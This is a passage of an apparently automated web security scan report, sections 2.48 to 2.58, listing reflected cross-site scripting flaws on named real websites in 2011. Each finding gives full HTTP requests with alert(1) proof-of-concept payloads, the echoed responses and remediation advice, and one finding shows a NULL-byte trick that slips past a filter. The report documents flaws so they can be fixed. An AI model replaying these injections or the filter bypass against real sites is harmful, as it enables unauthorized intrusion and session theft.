Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D9293a"%3balert(1)//ef5b805385b HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:56:27 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 10042
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
ZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3D9293a";alert(1)//ef5b805385bhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&clickTag=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIK
...[SNIP]...

2.48. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0049fa0'%3balert(1)//a0cbc58a018 was submitted in the loc parameter. This input was echoed as 49fa0';alert(1)//a0cbc58a018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0'%3balert(1)//a0cbc58a018&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE02
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 12:46:59 GMT
Content-Length: 1330

var sID= '937'; var sC= 'IPE937';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY.49fa0';alert(1)//a0cbc58a018'; var ps='sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0%27%3balert(1)%2f%2fa0cbc58a018&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite'
...[SNIP]...

2.49. http://postcalc.usps.gov/CombineScriptsHandler.ashx [_TSM_HiddenField_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://postcalc.usps.gov
Path:   /CombineScriptsHandler.ashx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c214d'%3balert(1)//ba0b57bcc30 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as c214d';alert(1)//ba0b57bcc30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CombineScriptsHandler.ashx?_TSM_HiddenField_=ctl00_ToolkitScriptManager1_HiddenFieldc214d'%3balert(1)//ba0b57bcc30&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3ae2e86ef9%3a1df13a87%3afde3863c%3aa9a7729d%3a9ea3f0e2%3a9e8e87e9%3a4c9865be%3aba594826%3a507fcf1b%3ac7a4182e HTTP/1.1
Host: postcalc.usps.gov
Proxy-Connection: keep-alive
Referer: http://postcalc.usps.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_qptudbmdfb_80=ffffffff3b223e1e45525d5f4f58455e445a4a421548

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: application/x-javascript
Content-Length: 161049
Vary: Accept-Encoding
Cache-Control: public, max-age=3583
Expires: Tue, 06 Sep 2011 13:52:50 GMT
Date: Tue, 06 Sep 2011 12:53:07 GMT
Connection: close

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
/END AjaxControlToolkit.Calendar.CalendarBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_ToolkitScriptManager1_HiddenFieldc214d';alert(1)//ba0b57bcc30').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:e2e86ef9:1df13a87:fde3863c:a9a7729d:9ea3f0e2:9e8e
...[SNIP]...

2.50. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /v1/public/yql/uhTrending/cokeTrending2

Issue detail

The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 155ee<script>alert(1)</script>7012a81052a was submitted in the limit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1155ee<script>alert(1)</script>7012a81052a HTTP/1.1
Host: query.yahooapis.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:34 GMT
Server: YTS/1.19.8
Age: 0
Proxy-Connection: keep-alive
Content-Length: 178

YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1155ee<script>alert(1)</script>7012a81052a'"}});

2.51. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 8a937%0a857122958df was submitted in the site parameter. This input was echoed as 8a937
857122958df
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=218075578a937%0a857122958df&d_id=scottrade HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASQRDBTD=EKEPPJLBDDNCLJEIBDBOFDGL; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 218075578a937
857122958df

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

2.52. http://show.partners-z.com/s/show [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /s/show

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae04b<script>alert(1)</script>6304665d48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/show?chan=YAHOO&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010&ae04b<script>alert(1)</script>6304665d48a=1 HTTP/1.1
Host: show.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:18 GMT
Server: Apache/2.2.9 (Debian)
Cache-Control: max-age=0, no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 892
Content-Type: text/html; charset=UTF-8

<html><head></head><body style="width:300px;height:200px;overflow:hidden;border:0px;margin:5px;text-align:center"><div id="haiku" style="height:3em;position:relative;top:50%;margin-top:-2em; color:#D2
...[SNIP]...
ces/showcase-display-server-1.4.12/server/param_mapper.py", line 121, in convert_params
raise InvalidParameterException ("unknown parameter (%s)" % k)
InvalidParameterException: unknown parameter (ae04b<script>alert(1)</script>6304665d48a)
</div>
...[SNIP]...

2.53. http://utdi.reachlocal.com/coupon/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e78be"><script>alert(1)</script>08a96ad64a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3069
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2
...[SNIP]...

2.54. http://utdi.reachlocal.com/coupon/ [dynamic_proxy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf04"><script>alert(1)</script>7fa24af02aa was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3079
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:56 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
nam
...[SNIP]...

2.55. http://utdi.reachlocal.com/coupon/ [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdd5"><script>alert(1)</script>2b246827237 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:00 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3069
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:52 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
...[SNIP]...

2.56. http://utdi.reachlocal.com/coupon/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62459"><script>alert(1)</script>8a2698860bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:18 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3087
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.57. http://utdi.reachlocal.com/coupon/ [primary_serv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db859"><script>alert(1)</script>c1c2d326329 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:08 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3043
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:00 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargi
...[SNIP]...

2.58. http://utdi.reachlocal.com/coupon/ [pub_cr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d06"><script>alert(1)</script>76c9d147fa9 was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
